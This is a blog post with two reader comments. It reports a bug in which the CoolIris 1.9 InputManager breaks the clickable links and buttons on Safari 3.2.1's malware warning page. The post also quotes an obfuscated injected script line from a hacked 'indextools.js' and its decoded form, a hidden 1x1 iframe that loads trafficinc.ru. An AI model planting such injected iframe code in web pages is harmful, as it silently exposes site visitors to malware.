Subscribe to
Posts
Comments
NSLog(); Header Image

CoolIris 1.9 Incompatibility with Safari 3.2.1

Today, after wasting a little time thinking that my Safari installation had gone awry, I tracked down a bug with CoolIris 1.9.0.16396 and Safari 3.2.1 regarding the latter's phishing/malware protection.

The bug manifests itself in a bit of an odd way:

CoolIris Bug

Without the CoolIris InputManager installed (at /Library/InputManagers/), visiting the "bad page" resulted in the "dialog box" seen on the bottom. With the CoolIris InputManager installed, the top image appears instead ((Note that after ignoring the top100-counter.com warning in the "without" version, another warning regarding trafficinc.ru would appear.)).

With CoolIris installed, I should have been able to click the links to "Learn more about phishing scams" and to "Report an error." Unfortunately they weren't clickable links. What's worse, "Ignore warning" wasn't clickable either, as you can see in this video.

Not only does the installation of CoolIris change Safari's warning (from malware to phishing) but it prevents you from doing anything with the buttons or links on the page.

Note on the Actual Phishing/Malware Issue
The offending page used to be here. The page still exists, but the site no longer loads the offending javascript, one named "indextools.js." Somehow, given the first line of code in that .js file, I doubt it's Yahoo's WebAnalytics:

document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%74%72%61%66%66%69%63%69%6E%63%2E%72%75%2F%69%6E%64%65%78%2E%70%68%70%27%20%77%69%64%74%68%3D%27%31%27%20%68%65%69%67%68%74%3D%27%31%27%20%73%74%79%6C%65%3D%27%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%27%3E%3C%2F%69%66%72%61%6D%65%3E'));

Decoded:

<iframe src='http://trafficinc.ru/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Suffice to say Kathleen's copy of indextools.js was likely hacked or downloaded from a less-than-reliable source.

CoolIris
I was starting to enjoy CoolIris. It integrates nicely with flickr, after all. So here's to hoping that someone can fix this strange bug quickly.

2 Responses to "CoolIris 1.9 Incompatibility with Safari 3.2.1"

  1. CoolIris is really neat software, but I've found on both my Core Duo mini and my PBG4 that it slows the system way down, and it makes Safari spectacularly crasharific.

    It's neat, but it isn't worth the crashes.

  2. Erik,
    Just want to say thanks again for your help in getting the situation resolved - I truly appreciate your time & knowledge, and your eagerness to help out. Have a great holiday season!